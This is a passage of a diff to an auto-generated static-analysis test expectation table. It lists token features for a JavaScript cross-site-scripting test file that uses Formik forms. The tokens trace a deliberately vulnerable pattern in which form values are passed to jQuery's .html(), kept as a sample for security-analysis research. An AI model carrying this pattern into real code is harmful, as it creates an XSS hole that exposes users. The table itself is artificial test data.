?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | values ... } | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | values ... } | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | values ... } | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | values ... } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:17 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:17 | $ | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:17 | $ | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:17 | $ | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:17 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | $("#id") | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | $("#id") | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | $("#id") | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | exceptional return of $("#id") | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | exceptional return of $("#id") | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:24 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:29 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:29 | $("#id").html | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:29 | $("#id").html | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:29 | $("#id").html | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:29 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | $("#id" ... es.foo) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | $("#id" ... es.foo) | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | $("#id" ... es.foo) | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | $("#id" ... es.foo) | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | $("#id" ... es.foo) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | exceptional return of $("#id" ... es.foo) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | exceptional return of $("#id" ... es.foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | exceptional return of $("#id" ... es.foo) | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | exceptional return of $("#id" ... es.foo) | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:17:9:41 | exceptional return of $("#id" ... es.foo) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:9:19:9:23 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:9:19:9:23 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:9:19:9:23 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24249,6 +158851,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:9:19:9:23 | "#id" | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | | autogenerated/Xss/XssThroughDom/forms.js:9:19:9:23 | "#id" | enclosingFunctionName | FormikBasic | | autogenerated/Xss/XssThroughDom/forms.js:9:19:9:23 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:26:9:29 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:26:9:29 | html | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:9:26:9:29 | html | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:26:9:29 | html | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:26:9:29 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:31:9:36 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:31:9:36 | values | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:9:31:9:36 | values | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:31:9:36 | values | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:31:9:36 | values | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:9:31:9:40 | values.foo | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:9:31:9:40 | values.foo | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:9:31:9:40 | values.foo | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24256,6 +158868,112 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:9:31:9:40 | values.foo | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | | autogenerated/Xss/XssThroughDom/forms.js:9:31:9:40 | values.foo | enclosingFunctionName | FormikBasic | | autogenerated/Xss/XssThroughDom/forms.js:9:31:9:40 | values.foo | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:9:38:9:40 | foo | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:9:38:9:40 | foo | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:9:38:9:40 | foo | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:9:38:9:40 | foo | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:9:38:9:40 | foo | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:11:20 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:11:20 | onSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:11:20 | onSubmit | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:11:20 | onSubmit | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:11:20 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:13:13:14 | onSubmi ... }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | 'arguments' object of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | 'arguments' object of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | 'arguments' object of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | 'arguments' object of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | (values ... } | assignedToPropName | onSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | (values ... } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | (values ... } | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | (values ... } | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | (values ... } | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | (values ... } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | exceptional return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | exceptional return of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | exceptional return of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | exceptional return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | return of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | return of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:23:13:13 | return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:24:11:29 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:32:11:48 | { setSubmitting } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:32:11:48 | { setSubmitting } | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:11:32:11:48 | { setSubmitting } | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:32:11:48 | { setSubmitting } | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:32:11:48 | { setSubmitting } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:11:34:11:46 | setSubmitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:17 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:17 | $ | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:17 | $ | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:17 | $ | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:17 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | $("#id") | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | $("#id") | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | $("#id") | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | exceptional return of $("#id") | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | exceptional return of $("#id") | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:24 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:29 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:29 | $("#id").html | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:29 | $("#id").html | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:29 | $("#id").html | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:29 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | $("#id" ... es.bar) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | $("#id" ... es.bar) | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | $("#id" ... es.bar) | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | $("#id" ... es.bar) | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | $("#id" ... es.bar) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | exceptional return of $("#id" ... es.bar) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | exceptional return of $("#id" ... es.bar) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | exceptional return of $("#id" ... es.bar) | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | exceptional return of $("#id" ... es.bar) | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:17:12:41 | exceptional return of $("#id" ... es.bar) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:12:19:12:23 | "#id" | CalleeFlexibleAccessPath | 